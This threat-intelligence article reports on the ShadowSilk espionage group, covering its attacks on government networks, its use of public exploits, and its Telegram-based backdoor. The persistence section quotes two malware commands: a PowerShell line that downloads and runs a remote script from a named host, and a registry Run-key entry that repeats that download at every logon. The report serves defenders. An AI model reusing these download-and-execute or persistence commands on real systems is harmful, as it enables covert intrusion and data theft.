ShadowSilk Leveraging Penetration-Testing Tools, Public Exploits to Attack Organizations

ShadowSilk first surfaced in late 2023 as a sophisticated threat cluster targeting government entities across Central Asia and the broader APAC region.

Exploiting known public vulnerabilities and widely available penetration-testing frameworks, the group orchestrates data exfiltration campaigns with a high degree of automation and stealth.

Initial deliveries were achieved via phishing emails containing password-protected archives; upon execution, these dropped a Telegram-based backdoor that established a covert command-and-control channel.

The rapid proliferation of ShadowSilk operations prompted heightened scrutiny across regional security teams.

In early 2025, Group-IB analysts identified renewed ShadowSilk infrastructure and a burst of new indicators of compromise, including updated Telegram bots and repurposed public exploits such as CVE-2024-27956 and CVE-2018-7602.

Researchers noted that the adversary’s toolkit blended open-source scanners like sqlmap and fscan with custom Telegram bot scripts, creating a versatile platform capable of reconnaissance, lateral movement, and bulk data theft.

This hybrid approach allowed ShadowSilk to alternate seamlessly between freely available tools and bespoke malware, complicating detection and response efforts.

By mid-2025, the group’s impact was undeniable: at least 35 government networks had suffered data breaches, while forensic captures of ShadowSilk’s server image revealed multilingual operators and intricate web-panel control suites.

Victims observed stolen mail server dumps, administrative credentials, and critical intelligence exfiltrated in daily ZIP archives.

The sophistication of these campaigns underscores ShadowSilk’s deliberate evolution from a small phishing-based actor into a persistent, multi-stage threat capable of sustaining prolonged intrusions.

Group-IB researchers noted that ShadowSilk’s operators maintain two sub-groups—one primarily Russian-speaking and the other Chinese-speaking—working in parallel yet sharing virtual assets.

Analysis of keyboard layouts, desktop screenshots, and Telegram command histories confirmed this bi-lingual operational model. Despite different tooling preferences, both factions converge on a consistent objective: covertly harvest sensitive information and evade traditional security controls.

Infection Mechanism and Persistence

ShadowSilk’s infection chain begins with a lure email delivering a ZIP archive that masquerades as an official report or vendor bulletin.

Upon extraction and execution of rev.exe, the PowerShell-based payload connects to a hardcoded URL such as https://tpp.tj/BossMaster.txt, invoking:-

powershell -ExecutionPolicy Bypass -Command "(Invoke-WebRequest https://tpp.tj/BossMaster.txt).Content | iex"
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v WinUpTask /t REG_SZ /d 'powershell -ExecutionPolicy Bypass -command "(Invoke-WebRequest https://tpp.tj/iap.txt).Content | iex"' /f

This snippet not only loads the primary backdoor but also writes a registry key under HKCUSoftwareMicrosoftWindowsCurrentVersionRun to ensure persistence after reboot.

The second stage script, /www/html/gramm.ps1, implements a Telegram bot loop that reads incoming commands via the Bot API, executes arbitrary shell instructions, and uploads results or files directly to the attacker’s Telegram chat.

The persistence mechanism leverages both registry autoruns and scheduled tasks. ShadowSilk routinely deploys a minimalistic downloader that fetches additional modules—Metasploit payloads, Cobalt Strike beacons, or custom RAT executables—through the same Telegram channel.

By interweaving social messaging infrastructure with conventional malware callbacks, ShadowSilk sidesteps network security tools that normally flag unknown TCP or HTTPS connections, blending malicious traffic into legitimate bot interactions.

Through this dual-stage infection and persistent backdoor, ShadowSilk maintains long-term access, enabling data collection, credential dumping, and systematic exfiltration of archived user documents to attacker-controlled endpoints.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.